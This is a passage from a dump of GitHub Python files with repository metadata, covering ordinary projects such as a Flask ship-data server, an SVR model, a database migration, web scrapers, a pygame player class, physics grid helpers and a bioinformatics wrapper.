request.data.decode('utf-8')\r\n index = Static_data.loc[Static_data[\"MMSI\"] == query].index[0]\r\n row = Static_data.loc[Static_data['MMSI'] == query]\r\n imo_number = row['IMO'].values[0].astype(str)\r\n main_folder = imo_number[0:4]\r\n file_one = imo_number[0:6] + \"_1\"\r\n file_two = imo_number[0:6] + \"_2\"\r\n file_address_one = 'static/images/ship_images/' + main_folder + '/' + file_one\r\n file_address_two = 'static/images/ship_images/' + main_folder + '/' + file_two\r\n addresses = {\"address_one\" : file_address_one , \"address_two\" : file_address_two}\r\n temp_series = pd.Series(addresses)\r\n temp_data = pd.concat([Static_data.loc[index],temp_series])\r\n return temp_data.to_json()\r\n\r\n#////////////////////////////////////////////////////////////////////////// MAIN //////////////////////////////////////////////////////////////////////////\r\nif __name__=='__main__':\r\n app.run(debug=False,port=8000)","repo_name":"RidaIftikhar14/MLOPS-FYP-Maritime-AI","sub_path":"app/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":12814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70180012921","text":"from typing import *\n\nfrom .mixins import *\nfrom .kernel import Kernel\nfrom ..bases import RegressorBase\n\n\n@RegressorBase.register(\"svr\")\nclass SVR(CoreSVRMixin, SVRMixin, RegressorBase):\n def __init__(\n self,\n *,\n eps: float = 0.0,\n kernel: str = \"rbf\",\n optimizer: str = \"rmsprop\",\n lb: Union[str, float] = \"auto\",\n kernel_config: Dict[str, Any] = None\n ):\n self._eps = eps\n self._opt = optimizer\n self._lb = self._raw_lb = lb\n if kernel_config is None:\n kernel_config = {}\n self._kernel = Kernel(kernel, **kernel_config)\n self._normalize_labels = True\n\n\n__all__ = [\"SVR\"]\n","repo_name":"carefree0910/carefree-ml","sub_path":"cfml/models/svm/svr.py","file_name":"svr.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"40"} +{"seq_id":"17811114934","text":"\"\"\"create apt_num on address table\n\nRevision ID: d620899a4069\nRevises: d9ed7cd0842f\nCreate Date: 2023-06-22 21:44:23.445290\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'd620899a4069'\ndown_revision = 'd9ed7cd0842f'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n op.add_column(\"address\",sa.Column(\"apt_num\",sa.String(),nullable=True))\n\n\n\ndef downgrade() -> None:\n op.drop_column(\"address\",\"apt_num\")\n","repo_name":"ChiaChiaPing/fastapi-projects","sub_path":"fastapi/alembic/versions/d620899a4069_create_apt_num_on_address_table.py","file_name":"d620899a4069_create_apt_num_on_address_table.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"34877424504","text":"import os\nos.chdir(os.path.dirname(os.path.realpath(__file__)))\n\nfrom bs4 import BeautifulSoup\nimport urllib2\nimport re\n\nwiki = \"https://en.wikipedia.org/wiki/List_of_infectious_diseases\"\nheader = {'User-Agent': 'Mozilla/5.0'} #Needed to prevent 403 error on Wikipedia\nreq = urllib2.Request(wiki,headers=header)\npage = urllib2.urlopen(req)\nsoup = BeautifulSoup(page, 'html.parser')\n\ntable = soup.find(\"table\", { \"class\" : \"wiki table sortable\" })\n\nwith open('..\\\\lists\\\\inf_diseases.txt', 'w') as f:\n for row in table.findAll(\"tr\"):\n cells = 
row.findAll(\"td\")\n write_to_file = \"\"\n for i in cells[0].strings:\n write_to_file += i\n write_to_file += \"\\n\"\n f.write(write_to_file.encode('utf-8'))\n","repo_name":"cgibbs/PlinyGen","sub_path":"greppers/grep_inf_disease.py","file_name":"grep_inf_disease.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9917632740","text":"#Program with a recursive function to calculate whether or not a string is a palindrome\r\n#KNNSAD001\r\n#Assignment 8\r\n\r\n#inserting word-(string)- to be evaluated by function\r\ninsert_string = input('Enter a string:\\n')\r\n\r\ndef palindrome (insert_string):\r\n \r\n if len(insert_string)<1:\r\n print ('Palindrome!')\r\n \r\n else:\r\n \r\n #if statement to evaluate if the first and last letters are the same \r\n if insert_string[0]==insert_string[-1]:\r\n \r\n #the recursive process that will decrease the length of a word by initiating previous step with subsequent characters \r\n return palindrome(insert_string[1:-1])\r\n else:\r\n print ('Not a palindrome!')\r\n \r\npalindrome(insert_string)","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_8/knnsad001/question1.py","file_name":"question1.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8619183183","text":"'''\nA simple script to compare multi threading with asyncio in a high I/O task.\nIt is fetching the same url, which points to an image (or whatever you wish),\nboth with multi threading and with asyncio.\n'''\n\nfrom timeit import default_timer\nimport asyncio\nfrom prettytable import PrettyTable\n\nfrom multi_threading import fetch_all\nfrom async_io import fetch_async\n\n\nif __name__ == '__main__':\n\n # Table header.\n t = PrettyTable(['Request Count', 'Multithreading', 'AsyncIO', 'Difference', 'Winner'])\n\n # Insert your URL.\n url = \"***\"\n\n # How many times to download.\n indexes = [1, 10, 100, 500, 1000]\n\n for i in indexes:\n\n urls = [url] * i\n\n start = default_timer() \n\n responses = fetch_all(urls)\n\n # Elapsed time.\n delta_multi = default_timer() - start\n\n start = default_timer() \n\n loop = asyncio.get_event_loop()\n future = asyncio.ensure_future(fetch_async(loop, i, url))\n loop.run_until_complete(future)\n responses = future.result()\n\n # Elapsed time.\n delta_async = default_timer() - start\n\n # Difference between the two ways.\n diff = delta_multi - delta_async\n\n faster = 'AsyncIO'\n if delta_multi < delta_async:\n faster = 'Multithreading'\n\n # Add table row.\n t.add_row([i, delta_multi, delta_async, abs(diff), faster])\n \n # Print table.\n print(t)\n","repo_name":"ByteByBit/Useful_Python","sub_path":"asyncio/url_fetch/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"38099729926","text":"# module visualizations.py\nfrom datetime import datetime\nimport visdom\n\nclass Visualizations:\n def __init__(self, env_name=None):\n if env_name is None:\n env_name = str(datetime.now().strftime(\"%d-%m %Hh%M\"))\n self.env_name = env_name\n self.vis = visdom.Visdom(env=self.env_name)\n self.loss_win = None\n\n def plot_loss(self, loss, step):\n self.loss_win = self.vis.line(\n [loss],\n [step],\n win=self.loss_win,\n update='append' if self.loss_win else None,\n opts=dict(\n xlabel='Step',\n 
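# (added note: visdom creates this window on the first call, while\n                # self.loss_win is still None, and later calls pass update='append' so new\n                # (step, loss) points extend the same trace instead of redrawing it.)\n                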
ylabel='Loss',\n title='Loss (mean per 10 steps)',\n )\n )\n","repo_name":"avshalomc/subtract","sub_path":"visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"9566168101","text":"import pygame\nfrom pygame.locals import *\nimport math\n\nfrom class_bullet import ClassBullet\n\n\nbullet_img = pygame.image.load(\"Assets/Bullet.png\")\n\n\nclass ClassPlayer(pygame.sprite.Sprite):\n def __init__(self, life):\n self._pos = [200, 200]\n self._vect_dir = [0, 0]\n self._size = 100\n self._time_to_shoot = 0.5\n self._timer = self._time_to_shoot\n self._death = False\n self.kills = 0\n\n # Load and set the image of the player\n self._img = pygame.image.load(\"Assets/Player.gif\")\n\n self._img_rot = self._img # Set a copy of the original image\n self._rect = self._img_rot.get_rect()\n self._rect.center = self._pos\n self._life = life\n\n # Draw a player image on the screen\n\n def draw(self, surface):\n surface.blit(self._img_rot, self._rect)\n\n # Return position of the player\n\n @property\n def position(self):\n return self._pos\n\n @property\n def rect(self):\n return self._rect\n\n @property\n def life(self):\n return self._life\n\n @life.setter\n def life(self, value):\n self._life = value\n\n @property\n def death(self):\n return self._death\n\n @property\n def kills(self):\n return self._kills\n\n @kills.setter\n def kills(self, value):\n self._kills = value\n\n # Movement of the player\n\n def Movement(self, speed): # Update player actions\n if pygame.key.get_pressed()[K_w]: # Direction of rect in Y axis\n self._vect_dir[1] = -1\n elif pygame.key.get_pressed()[K_s]:\n self._vect_dir[1] = 1\n else:\n self._vect_dir[1] = 0\n\n if pygame.key.get_pressed()[K_a]: # Direction of rect in X axis\n self._vect_dir[0] = -1\n elif pygame.key.get_pressed()[K_d]:\n self._vect_dir[0] = 1\n else:\n self._vect_dir[0] = 0\n\n # Apply the movemento to the position\n self._pos[0] += self._vect_dir[0]*speed\n self._pos[1] += self._vect_dir[1]*speed\n\n self._rect.center = self._pos\n\n if self._life <= 0:\n self._death = True\n\n # Rotate player respectively to position of mouse\n\n def Rotation_Shoot(self, pos_of_mouse, bullet_speed, dt, bullet_list):\n # Vector of mouse relative to player\n xp, yp = pos_of_mouse[0] - self._pos[0], pos_of_mouse[1] - self._pos[1]\n\n # Get angle of mouse relative to player\n angle = 360 - math.atan2(yp, xp)*180/math.pi\n\n self._img_rot = pygame.transform.rotate(\n self._img, angle) # Set a rotation on a imagen\n self._rect = self._img_rot.get_rect()\n self._rect.center = self._pos\n\n # Instantiate a bullet\n self._timer -= dt\n\n if (pygame.mouse.get_pressed() == (1, 0, 0)) and self._timer <= 0:\n dir_normalized = (xp/math.hypot(xp, yp), yp/math.hypot(xp, yp))\n\n bullet_list.append(ClassBullet(\n bullet_img, bullet_speed, angle, self._pos.copy(), dir_normalized))\n\n self._timer = self._time_to_shoot\n","repo_name":"Keller-Javi/First-Game-in-Pygames","sub_path":"class_player.py","file_name":"class_player.py","file_ext":"py","file_size_in_byte":3148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9124410915","text":"\"\"\"\nStream lit GUI for Generator Algorithms\n\"\"\"\n\n# Imports\n# import os\n# import cv2\nimport streamlit as st\n# import json\n# import subprocess\n# import functools\n\nfrom Algorithms.GeneratorAlgos.RandomGenerator import *\n\n# Main 
Functions\ndef main_GeneratorAlgos():\n SUBAPP_MODES = config_subapp[\"ALGORITHMS\"]\n\n # Create Sidebar\n selected_box = st.sidebar.selectbox(\n 'Choose Generator Algorithm',\n tuple(\n SUBAPP_MODES\n )\n )\n\n # Add Functions\n correspondingFuncName = selected_box.replace(' ', '_').lower()\n if correspondingFuncName in globals().keys():\n globals()[correspondingFuncName]()\n\n#############################################################################################################################\n# Repo Based Vars\n\n\n# Util Vars\n\n\n# Util Functions\n\n\n# Main Functions\n\n\n# UI Functions\ndef UI_RandomFrequencyDistribution():\n USERINPUT_numRange = st.slider(\"Select Random Value Range\", 1, 100, (1, 5), 1)\n USERINPUT_nframes = st.number_input(\"Select Number of Values to Generate\", 1, 500, 10, 1)\n USERINPUT_saveFPS = USERINPUT_nframes / DEFAULT_VIDEO_DURATION\n\n if st.button(\"Generate\"):\n # Process Inputs\n Is = RandomFrequencyDistribution_Vis(USERINPUT_numRange, USERINPUT_nframes, 'Random Frequency Distribution')\n\n # Display Outputs\n st.markdown(\"## Generated Random Frequency Distribution\")\n VideoUtils.SaveFrames2Video(Is, PATHS[\"default\"][\"save\"][\"video\"], USERINPUT_saveFPS)\n VideoUtils.FixVideoFile(PATHS[\"default\"][\"save\"][\"video\"], PATHS[\"default\"][\"save\"][\"video_converted\"])\n # Display Animation Video\n st.video(PATHS[\"default\"][\"save\"][\"video_converted\"])\n\ndef UI_Random2DPoints():\n col1, col2 = st.columns(2)\n USERINPUT_pointXBounds = col1.slider(\"Select X Values Bound\", 1, 100, (1, 5), 1)\n USERINPUT_pointYBounds = col2.slider(\"Select Y Values Bound\", 1, 100, (1, 5), 1)\n USERINPUT_nframes = st.number_input(\"Select Number of Points to Generate\", 1, 500, 10, 1)\n USERINPUT_saveFPS = USERINPUT_nframes / DEFAULT_VIDEO_DURATION\n\n if st.button(\"Generate\"):\n # Process Inputs\n Is = Random2DPointsGenerator_Vis([USERINPUT_pointXBounds, USERINPUT_pointYBounds], USERINPUT_nframes, 'Random 2D Points')\n\n # Display Outputs\n st.markdown(\"## Generated Random 2D Points\")\n VideoUtils.SaveFrames2Video(Is, PATHS[\"default\"][\"save\"][\"video\"], USERINPUT_saveFPS)\n VideoUtils.FixVideoFile(PATHS[\"default\"][\"save\"][\"video\"], PATHS[\"default\"][\"save\"][\"video_converted\"])\n # Display Animation Video\n st.video(PATHS[\"default\"][\"save\"][\"video_converted\"])\n\ndef UI_Random3DPoints():\n col1, col2, col3 = st.columns(3)\n USERINPUT_pointXBounds = col1.slider(\"Select X Values Bound\", 1, 100, (1, 5), 1)\n USERINPUT_pointYBounds = col2.slider(\"Select Y Values Bound\", 1, 100, (1, 5), 1)\n USERINPUT_pointZBounds = col3.slider(\"Select Z Values Bound\", 1, 100, (1, 5), 1)\n USERINPUT_nframes = st.number_input(\"Select Number of Points to Generate\", 1, 500, 10, 1)\n USERINPUT_saveFPS = USERINPUT_nframes / DEFAULT_VIDEO_DURATION\n\n if st.button(\"Generate\"):\n # Process Inputs\n Is = Random3DPointsGenerator_Vis([USERINPUT_pointXBounds, USERINPUT_pointYBounds, USERINPUT_pointZBounds], USERINPUT_nframes, 'Random 3D Points')\n\n # Display Outputs\n st.markdown(\"## Generated Random 3D Points\")\n VideoUtils.SaveFrames2Video(Is, PATHS[\"default\"][\"save\"][\"video\"], USERINPUT_saveFPS)\n VideoUtils.FixVideoFile(PATHS[\"default\"][\"save\"][\"video\"], PATHS[\"default\"][\"save\"][\"video_converted\"])\n # Display Animation Video\n st.video(PATHS[\"default\"][\"save\"][\"video_converted\"])\n\nRANDOMGENERATOR_VISUALISAITON_MAP = {\n \"Random Frequency Distribution\": UI_RandomFrequencyDistribution,\n \"Random 2D Points\": 
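# (added note: random_generators() below passes these keys to st.selectbox\n    # and invokes the chosen UI_* function straight from this map, so no\n    # if/elif dispatch is needed)\n    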
UI_Random2DPoints,\n \"Random 3D Points\": UI_Random3DPoints\n}\n\n# Repo Based Functions\ndef random_generators():\n # Title\n st.header(\"Random Generators\")\n\n # Load Inputs\n USERINPUT_VisChoice = st.selectbox(\"Select Visualization Type\", list(RANDOMGENERATOR_VISUALISAITON_MAP.keys()))\n\n # Process Inputs\n RANDOMGENERATOR_VISUALISAITON_MAP[USERINPUT_VisChoice]()\n \n#############################################################################################################################\n# Driver Code\nmain_GeneratorAlgos()","repo_name":"KausikN/AlgoVis","sub_path":"StreamLitGUI/apps/apps_GeneratorAlgos.py","file_name":"apps_GeneratorAlgos.py","file_ext":"py","file_size_in_byte":4409,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"33873016229","text":"from read_wout import *\nimport numpy as np\n\ndef kGrid(equil=None, psitor=0.5, y0=14.14, jtwist=-1, nx=100, ny=64):\n \n xv, yv = np.meshgrid(get_akx(equil, psitor, y0, nx, jtwist),\\\n get_aky(ny, y0))\n # plot ccw path\n fig, ax = plt.subplots()\n ax.set_xlim((xv.min(),xv.max()))\n ax.set_ylim((yv.min(),yv.max()))\n ax.set_xlabel('$k_y\\\\rho_{r}$')\n ax.set_ylabel('$k_x\\\\rho_{r}$')\n ax.scatter(xv.flatten(),yv.flatten(), color='red', marker='.', cmap=\"RdYlGn\")\n plt.show()\n\n\ndef twist_and_shift_geo_fac(equil=None, psitor=0.5):\n\n dxdpsi_sign = -1. # Ni idea por qué. Debería ser igual a sign_toroidal_flux\n dydalpha_sign = 1.\n dydalpha = dydalpha_sign*rhotor(psitor)\n drhodpsi = dxdpsi_sign*sign_torflux(equil)/rhotor(psitor)\n dxdpsi = dxdpsi_sign*sign_torflux(equil)/rhotor(psitor)\n\n return -2.*pi*get_shat(equil, psitor)*\\\n (1/get_iota(equil, psitor))*\\\n drhodpsi*dydalpha/(dxdpsi*rhotor(psitor))\n\ndef get_naky(ny=100):\n return (ny-1)/3 + 1\n\ndef get_nakx(nx=64):\n return 2*((nx-1)/3) + 1\n\ndef get_aky(ny=100, y0=10.0):\n aky = empty(get_naky(ny),dtype='float')\n dky = get_dky(y0)\n for iky in arange(0, get_naky(ny)):\n aky[iky] = float(iky)*dky\n return aky\n\ndef get_akx(equil=None, psitor=0.49, y0=10.0, nx=64, jtwist=-1):\n # get the ikx index corresponding to kx_max\n ikx_max = int(get_nakx(nx)/2+1)\n\n # get the total number of ky values, including negative ky\n #naky_all = 2*get_naky(ny)-1\n\n # kx goes from zero to kx_max down to zero...\n akx = empty(get_nakx(nx), dtype='float')\n dkx = get_dkx(equil, psitor, y0, nx)\n \n for ikx in arange(0, ikx_max):\n akx[ikx] = float(ikx)*get_dkx(equil, psitor, y0, nx, jtwist)\n \n # and then from -kx_max to -|kx_min|\n for ikx in arange(ikx_max, get_nakx(nx)):\n akx[ikx] = float(ikx-get_nakx(nx))*get_dkx(equil, psitor, y0, nx, jtwist)\n\n return akx\n\ndef get_dky(y0=None):\n return 1.0/y0\n\ndef get_dkx(equil=None, psitor=0.49, y0=10.0, nx=64, jtwist=-1):\n if abs(get_shat(equil, psitor)) <= shat_zero():\n dkx = get_dky(y0) / float(get_jtwist())\n else:\n dkx = get_dky(y0) * abs(twist_and_shift_geo_fac(equil, psitor))/\\\n float(get_jtwist(equil, psitor, jtwist))\n return dkx\n\ndef shat_zero():\n return 1E-2\n\ndef get_jtwist(equil=None, psitor=None, jtwist=-1):\n if (jtwist < 1):\n jtwist = max(1,int(abs(twist_and_shift_geo_fac(equil, psitor))+0.5))\n return jtwist\n\n\n\n","repo_name":"mabarnes/stella","sub_path":"stellapy/stellapy_old/twist_and_shift.py","file_name":"twist_and_shift.py","file_ext":"py","file_size_in_byte":2536,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"22727813701","text":"from multiprocessing import 
Process\n\nfrom user.aid_mid import AidMid\nfrom user.userinfo import UserInfo\n\nfrom downloader.get_arcurl import GetAid\nfrom downloader.get_video_address import GetVideoURL\nfrom downloader.save_video import SaveVideo\nfrom logs.log import Log\n\n\nclass Scheduler(object):\n @staticmethod\n def aid_mid():\n AidMid().run()\n\n @ staticmethod\n def user_info():\n UserInfo().run()\n\n @staticmethod\n def downloader():\n arcurl = GetAid().get_aid()\n get_video = GetVideoURL(arcurl)\n current_url, video_title, video_url_list = get_video.run()\n SaveVideo(current_url, video_title, video_url_list).run()\n\n def run(self):\n p1 = Process(target=self.aid_mid)\n p1.start()\n\n p2 = Process(target=self.user_info)\n p2.start()\n\n # p3 = Process(target=self.downloader) #\n # p3.start()\n\n\nif __name__ == '__main__':\n scheduler = Scheduler()\n scheduler.run()\n","repo_name":"kclambda/bilibili","sub_path":"scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18097239543","text":"import re\nfrom nltk import RegexpParser, pos_tag\n\nclass AnahtarKelimeler(object):\n def __init__(self, corpus=None, stop_words=[], alpha=0.5):\n if alpha < 0.0 or alpha > 1.0:\n raise ValueError(\"Alpha 0 ile 1 arasında olmalıdır.\")\n self.stop_words = stop_words\n stop_word_regex_list = []\n for word in self.stop_words:\n word_regex = r'\\b' + word + r'(?![\\w-])'\n stop_word_regex_list.append(word_regex)\n self.stop_word_pattern = re.compile('|'.join(stop_word_regex_list), re.IGNORECASE)\n self.corpus = corpus\n self.alpha = alpha\n self.parser = RegexpParser('''\n KEYWORDS: {
<DT>? <JJ>* <NN.*>+}\n            P: {<IN>}\n            V: {<V.*>}\n            PHRASES: {<KEYWORDS> <P> <KEYWORDS>
    }\n ACTIONS: { *}\n ''')\n\n def sayi_mi(self, s):\n try:\n float(s) if '.' in s else int(s)\n return True\n except ValueError:\n return False\n\n def _cumleleri_ayir(self, metin):\n cumle_bolucu = re.compile(u'[.!?,;:\\t\\\\\\\\\"\\\\(\\\\)\\\\\\'\\u2019\\u2013\\n]|\\\\s\\\\-\\\\s')\n cumleler = cumle_bolucu.split(metin)\n return cumleler\n\n def _ifadeleri_ayir(self, cumleler):\n ifade_listesi = []\n for c in cumleler:\n tmp = re.sub(self.stop_word_pattern, '|', c.strip())\n ifadeler = tmp.split(\"|\")\n for ifade in ifadeler:\n ifade = ifade.strip().lower()\n if ifade != \"\":\n ifade_listesi.append(ifade)\n ifade_listesi_yeni = []\n for p in ifade_listesi:\n etiketler = pos_tag(self._kelime_ayir(p))\n if etiketler != []:\n parcalar = self.parser.parse(etiketler)\n for subtree in parcalar.subtrees(filter=lambda t: t.label() == 'KEYWORDS'):\n anahtar_kelime = ' '.join([i[0] for i in subtree])\n ifade_listesi_yeni.append(anahtar_kelime)\n\n return ifade_listesi_yeni\n\n\n def _kelime_ayir(self, metin):\n bolumleyici = re.compile('[^a-zA-Z0-9_\\\\+\\\\-/]')\n kelimeler = []\n for tek_kelime in bolumleyici.split(metin):\n mevcut_kelime = tek_kelime.strip().lower()\n if mevcut_kelime != '' and not self.sayi_mi(mevcut_kelime):\n kelimeler.append(mevcut_kelime)\n return kelimeler\n\n @property\n def _corpus_anahtar_kelimeleri(self):\n if self.corpus:\n cumleler = self._cumleleri_ayir(self.corpus)\n return self._ifadeleri_ayir(cumleler)\n else:\n return None\n\n\n def kelime_skorlarini_hesapla(self, ifade_listesi):\n kelime_sikligi = {}\n kelime_derecesi = {}\n for ifade in ifade_listesi:\n kelime_listesi = self._kelime_ayir(ifade)\n kelime_listesi_uzunlugu = len(kelime_listesi)\n kelime_listesi_derecesi = kelime_listesi_uzunlugu - 1\n for kelime in kelime_listesi:\n kelime_sikligi.setdefault(kelime, 0)\n kelime_sikligi[kelime] += 1\n kelime_derecesi.setdefault(kelime, 0)\n kelime_derecesi[kelime] += kelime_listesi_derecesi\n for madde in kelime_sikligi:\n kelime_derecesi[madde] = kelime_derecesi[madde] + kelime_sikligi[madde]\n kelime_skoru = {}\n for madde in kelime_sikligi:\n kelime_skoru.setdefault(madde, 0)\n kelime_skoru[madde] = kelime_derecesi[madde] / (kelime_sikligi[madde] * 1.0)\n return kelime_skoru\n\n\n @property\n def _corpus_kelime_skorlari(self):\n corp_anahtar_kelimeleri = self._corpus_anahtar_kelimeleri\n if corp_anahtar_kelimeleri:\n kelime_skorlari = self.kelime_skorlarini_hesapla(corp_anahtar_kelimeleri)\n anahtar_kelime_adaylari = {}\n for ifade in corp_anahtar_kelimeleri:\n anahtar_kelime_adaylari.setdefault(ifade, 0)\n kelime_listesi = self._kelime_ayir(ifade)\n aday_skoru = 0\n for kelime in kelime_listesi:\n aday_skoru += kelime_skorlari[kelime]\n anahtar_kelime_adaylari[ifade] = aday_skoru\n return anahtar_kelime_adaylari\n else:\n return None\n\n def ifade_skorlama(self, ifade_listesi, kelime_skoru):\n corp_skorlari = self._corpus_kelime_skorlari\n anahtar_kelime_adaylari = {}\n for ifade in ifade_listesi:\n anahtar_kelime_adaylari.setdefault(ifade, 0)\n kelime_listesi = self._kelime_ayir(ifade)\n aday_skoru = 0\n for kelime in kelime_listesi:\n aday_skoru += kelime_skoru[kelime]\n if corp_skorlari:\n anahtar_kelime_adaylari[ifade] = (1-self.alpha)*aday_skoru + (self.alpha)*(corp_skorlari[ifade] if ifade in corp_skorlari else 0.0)\n else:\n anahtar_kelime_adaylari[ifade] = aday_skoru\n return anahtar_kelime_adaylari\n\n def anahtar_kelimeleri_al(self, metin, n=20):\n cumle_listesi = self._cumleleri_ayir(metin)\n ifade_listesi = 
self._ifadeleri_ayir(cumle_listesi)\n kelime_skorlari = self.kelime_skorlarini_hesapla(ifade_listesi)\n anahtar_kelime_adaylari = self.ifade_skorlama(ifade_listesi, kelime_skorlari)\n return sorted(anahtar_kelime_adaylari.items(), key=lambda x: x[1], reverse=True)[:n]\n","repo_name":"tuecyz/TurkceMetinOzeti","sub_path":"ingilizceAnahtar.py","file_name":"ingilizceAnahtar.py","file_ext":"py","file_size_in_byte":5508,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30770900164","text":"#!/usr/bin/python\n#coding: utf-8\n\nfrom json import *\n\nclass User():\n def __init__(self, username):\n self.username = username # unique flag for each user\n self.email = \"\" # maybe some user do not show their email address\n self.fullname = \"\"\n self.photourl = \"\"\n self.repos = [] # repositories the user own\n self.homepage = \"\" # some users show their own website address\n self.homelocation = \"\" # users' location information\n self.jointime = \"\" #\n self.worksfor = \"\" # work team\n self.orgnizations = [] # orgnizations, maybe more than one\n self.followers = [] # will store User() objects of followers\n self.following = [] # ..\n self.starred = [] # repositories the user starred\n self.hashcode = hash(username)\n # in Github, the username is different from each other\n\n def set_username(self, username):\n self.username = username\n\n # the content of user_dict could be collected from https://github.com/username?tab=repositories\n def set_basic_information(self, user_dict):\n self.email = user_dict['email']\n self.fullname = user_dict['fullname']\n self.photourl = user_dict['image']\n self.homelocation = user_dict['homelocation']\n self.homepage = user_dict['homepage']\n self.worksfor = user_dict['worksfor']\n self.orgnizations = user_dict['orgnizations']\n self.jointime = user_dict['jointime']\n #self.repos = user_dict['repositories']\n\n # the follow information would be collected from other related pages: star, following, followers\n #self.followers\n #self.following\n #self.starred\n def set_followers(self, followers):\n self.followers = followers\n\n def set_following(self, following):\n self.following = following\n\n def set_starred(self, starred):\n self.starred = starred\n\n # use to get user information\n def get_followers(self):\n if self.followers is None:\n return []\n return self.followers\n\n def get_following(self):\n if self.following is None:\n return []\n return self.following\n\n def get_starred(self):\n if self.starred is None:\n return []\n return self.starred\n\n def get_username(self):\n return self.username\n\n def get_dict(self):\n self.dict = {'username': self.username, \\\n 'email': self.email, \\\n 'fullname': self.fullname,\\\n 'image': self.photourl, \\\n 'homelocation':self.homelocation,\\\n 'homepage': self.homepage, \\\n 'worksfor': self.worksfor, \\\n 'orgnizations':self.orgnizations, \\\n 'jointime': self.jointime, \\\n 'repositories':self.repos, \\\n 'followers': self.followers, \\\n 'following': self.following, \\\n 'starred': self.starred, \\\n 'hashcode': self.hashcode}\n return self.dict\n\n # make it easier to write to files\n def to_json(self):\n self.get_dict()\n return JSONEncoder().encode(self.dict)\n\n# There is a little different between personal user and orgnization user\n# html tags
    ... maybe easier to be found and handle\nclass OrgnizationUser(User):\n def __init__(self, username):\n User.__init__(self,username)\n self.people = []\n self.website_url = []\n","repo_name":"life-fuzzer/NewOne","sub_path":"Objs/GitHubUser.py","file_name":"GitHubUser.py","file_ext":"py","file_size_in_byte":3807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39170868944","text":"#6064번 카잉 달력\nimport sys\ninput = sys.stdin.readline\nfrom math import gcd\nif __name__ == \"__main__\":\n t = int(input())\n for i in range(t) : \n m,n,x,y = map(int,input().split())\n common_multiple = (m*n)//gcd(m,n)\n num = 0\n answer = -1\n while m*num+x <= common_multiple : \n if (m*num+x-1)%n+1 == y : \n answer = m*num+x\n break\n num += 1\n print(answer)\n","repo_name":"tomy9729/Algorithm","sub_path":"BaekJoon/Silver/1/6064번 카잉 달력.py","file_name":"6064번 카잉 달력.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"13626604735","text":"#!/usr/bin/env python\nimport re,os,subprocess,sys\nfrom uuid import uuid4\nsys.path.append(os.path.dirname(__file__))\nimport fasta_mini_han\n\ncodes = ['universal','Euplotes','Tetrahymena','Candida','Acetabularia']\nclass pkg():\n\t\"\"\"predict transcript's amino acid sequences\n\n\t:param args: args include\n\t:type update: True\n\t\"\"\"\n\tdef __init__(self, args={}):\n\t\t\"add all options var into self\"\n\t\tself.notes = []\n\t\tself.args = {}\n\t\tself.args.update(args)\n\t\tself.env = {\n\t\t\t'cmd_path':os.path.join(os.path.dirname(__file__),'../../util/transdecoder/')\n\t\t}\n\t\t# addtion\n\n\tdef res(self):\n\t\t\"for module result, save a tmp fasta to execute transdecoder\"\n\t\t#self.args['tmp'] = self.args['tmp'] or os.path.split(__file__)[0]\n\t\tcmd_path = os.path.abspath(self.args.get('cmd_path') or self.env['cmd_path'])\n\t\to_path = os.getcwd()\n\t\tos.chdir(self.args['tmp'])\n\t\tfn = '%s.fa' % uuid4().hex\n\t\tf_log = open(fn+'.log','w')\n\n\t\t# save file\n\t\topen(fn,'w').write(self.args['fasta'].read())\n\t\t# LongOrfs\n\t\tt_srp = [os.path.join(cmd_path,'TransDecoder.LongOrfs'),'-t',fn]\n\t\tif self.args.get('code') and (self.args['code'] != 'universal'):\n\t\t\tt_srp.extend(['-G',self.args['code']])\n\t\tif self.args.get('sense'):\n\t\t\tt_srp.extend(['-S'])\n\t\tos.system(' '.join(t_srp))\n\t\tp = subprocess.Popen(t_srp, stdout=subprocess.PIPE,stderr=subprocess.PIPE)\n\t\tf_log.write(p.stdout.read())\n\t\t# Predict\n\t\tt_srp = [os.path.join(cmd_path,'TransDecoder.Predict'),'-t',fn]\n\t\tif not self.args.get('multi'):\n\t\t\tt_srp.extend(['--single_best_orf'])\n\t\tos.system(' '.join(t_srp))\n\t\tp = subprocess.Popen(t_srp, stdout=subprocess.PIPE,stderr=subprocess.PIPE)\n\t\tf_log.write(p.stdout.read())\n\t\tf_log.close()\n\t\t# parse fasta\n\t\tres = []\n\t\tre_name = re.compile('(\\w+):(\\d+)-(\\d+)\\(([-\\+])\\)')\n\t\tfor i in fasta_mini_han.fasta_mini_han(open(fn+'.transdecoder.pep')):\n\t\t\tt_re = re_name.findall(i.name)[0]\n\t\t\tt_rng = 